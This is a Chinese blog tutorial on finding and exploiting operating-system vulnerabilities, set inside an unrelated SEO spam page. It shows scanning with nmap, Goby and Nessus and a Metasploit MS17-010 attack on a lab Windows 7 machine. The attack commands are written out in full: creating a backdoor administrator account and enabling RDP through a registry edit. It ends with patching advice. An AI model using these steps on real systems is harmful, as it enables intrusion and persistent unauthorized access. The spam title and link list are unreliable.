当前位置: 首页 > news >正文

专做公司网站 大庆网络广告策划方案范文

专做公司网站 大庆,网络广告策划方案范文,郑州网站建设推广优化,定制化网站开发一般多少钱操作系统漏洞发现前言一、操作系统漏洞发现1.1 namp2. Goby3. Nessus二,进行渗透测试2.1 使用工具进行渗透1. metasploit2.2 EXP2.3 复现文章三,操作系统漏洞修复前言 不管是对于App来说,还是web站点来说,操作系统是必须的&#x…

操作系统漏洞发现

  • 前言
  • 一、操作系统漏洞发现
      • 1.1 namp
      • 2. Goby
      • 3. Nessus
  • 二,进行渗透测试
      • 2.1 使用工具进行渗透
          • 1. metasploit
      • 2.2 EXP
      • 2.3 复现文章
  • 三,操作系统漏洞修复


前言

不管是对于App来说,还是web站点来说,操作系统是必须的,对于任何一个站点,进行渗透,无非就是渗透如下几个方面:

  1. 操作系统,进行信息收集后,查看站点操作系统是否为最新版本,如果不是,在网上搜索,看当前操作系统是否有漏洞出现
  2. 系统软件,进行信息收集后,通过看站点所开放的端口,可以大致确定对方站点系统所使用的软件,入80端口,就是http服务端口,对方站点应该有web站点,开发8080对方站点可能有apache等软件,在网上查找,看当前apache版本是否有漏洞
  3. 第三方软件,如phpmyadmin,ssh工具等,看这个版本的软件是否有漏洞
  4. 最后一步才是对站点网站进行渗透,看网站是否有sql注入,逻辑漏洞等

如下是针对操作系统漏洞发现的类容:


一、操作系统漏洞发现

想要发现操作系统漏洞,不用想,肯定是工具扫描啊,推荐如下三款工具,namp,Goby,nessus。

1.1 namp

namp扫描教程

如上教程中的脚本利用就是操作系统漏洞扫描,如下是我扫描windows7靶机的结果,由于安装的是没有进行更新的windows,所以存在该漏洞,图如下所示:

在这里插入图片描述

2. Goby

Goby使用的是忍者操作系统上面的,忍者操作系统下载:忍者操作系统安装教程,进行漏洞扫描,就如下两步,把英文设置为中文之后,一切操作都非常简单,具体操作如下所示:
请添加图片描述

请添加图片描述

如上所示,点击开始就可以进行漏洞扫描了,全部扫描结果以可视化的方式进行展现,非常的人性化。

3. Nessus

Nessus是三款工具中最优秀的,Nessus的安装教程:Nessus安装教程,安装好之后就可以进行漏洞扫描了,其中的操作在安装教程中有说,我这里就不进行重新说明了:

二,进行渗透测试

2.1 使用工具进行渗透

1. metasploit
  1. 开启metasploit,及打开metasploit的控制台,使用如下两条命令:

    service postgresql start  # 开启数据库postgresq
    msfconsole  # 打开控制台
    
  2. 搜索ms17-010可以利用的漏洞模块,再次确定是否存在漏洞,如下所示:
    在这里插入图片描述

    search ms17-010  # 搜索模块
    use 3  # 使用第三个模块,看目标主机是否存在这个漏洞(进一步的确定)
    show options  # 查看需要设置的参数
    set rhost 192.168.93.134  # 设置参数,目标机器的IP地址为 192.168.93.134
    run  # 进行攻击,exploit命令也可以
    

    在这里插入图片描述

  3. 搜索ms17-010可以利用的漏洞模块,对漏洞进行攻击,控制目标机器,如下所示:依次使用如下几条命令

search ms17-010
use 0  # 使用攻击模块攻击主机
show options
set rhost 192.168.93.134  设置攻击的目标地址
exploit

在这里插入图片描述
4. 进行提权等一系列操作

shell  # 控制目标机器
net user root 123456 /add  # 创建普通用户
net localgroup administrators root /add  # 对普通用户进行提权

进行如下操作后,你打开windows目标机器,你会发现多了一个超级管理员用户如下所示:

在这里插入图片描述
5. 远程访问控制

首先输入REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f,打开目标机器的3389端口,该端口开放后就可以进行远程连接了:

在这里插入图片描述

开放端口之后,在新的终端进行远程桌面的连接,如下所示:

rdesktop 192.168.93.134:3389  # 进行远程连接目标机器,192.168.93.134是我目标机器的IP地址

在这里插入图片描述

如上再输入yes就是远程桌面的连接了,连接后的结果如下所示:

在这里插入图片描述
在这里插入图片描述

2.2 EXP

EXP是漏洞攻击的代码,可以进入如下两个网站进行查找,如下所示:
seebug漏洞平台
国家漏洞安全平台
在这里插入图片描述
漏洞利用数据库

2.3 复现文章

复现文章网上都有,直接寻找,如永恒之蓝:

在这里插入图片描述
搜索技巧:
信息搜集

三,操作系统漏洞修复

  1. 针对设计错误,微软公司会及时推出补丁程序,用户只需及时下载并安装即可,因此建议用户经常浏览微软的安全公告,并及时下载补丁。

  2. 对于设置错误,则应及时修改配置,使系统更加安全可靠。

http://www.hkea.cn/news/281690/

相关文章:

  • 如何在社交网站上做视频推广seo营销的概念
  • 大连做网站仟亿科技最新域名查询
  • 网站开发实施计划与安排宁波网络推广方式
  • 企业网站建设公司注意哪些问题软件开发外包公司
  • abc网站建设怎么样yandex引擎搜索入口
  • wordpress屏蔽f12广州seo网络优化公司
  • 南宁网站建设推广服务云服务器免费
  • 大数据营销是什么seo站长
  • 建设政府网站的公司乐山网站seo
  • 仿站容易还是建站容易专业做灰色关键词排名
  • 做网站背景音乐管理课程培训
  • 网站建设可以自学吗品牌软文范文
  • 网站风格对比哪里有学计算机培训班
  • 做mla的网站网站优化哪家好
  • 网站注册的账号怎么注销线上营销活动有哪些
  • 国内做进口的电商网站网站推广软件哪个好
  • 谁有做那事的网站百度投诉中心入口
  • 免费单页网站在线制作沈阳seo排名优化教程
  • 廊坊网站建大型网站建站公司
  • 远程桌面做网站sem和seo区别与联系
  • 做贷款网站优化大师有用吗
  • 有没有便宜的网站制作制作网页教程
  • 医院网站制作优化关键词的方法有哪些
  • wordpress安装到网站吗泰安seo
  • 长春网站开发培训价格google play三件套
  • 做生存分析的网站有哪些国外新闻最新消息
  • 济南网站优化收费百度互联网营销
  • bootstrap响应网站模板下载发帖推广百度首页
  • 动态网站上的查询怎么做新媒体运营培训学校
  • 网站开发人员必备技能百度优化推广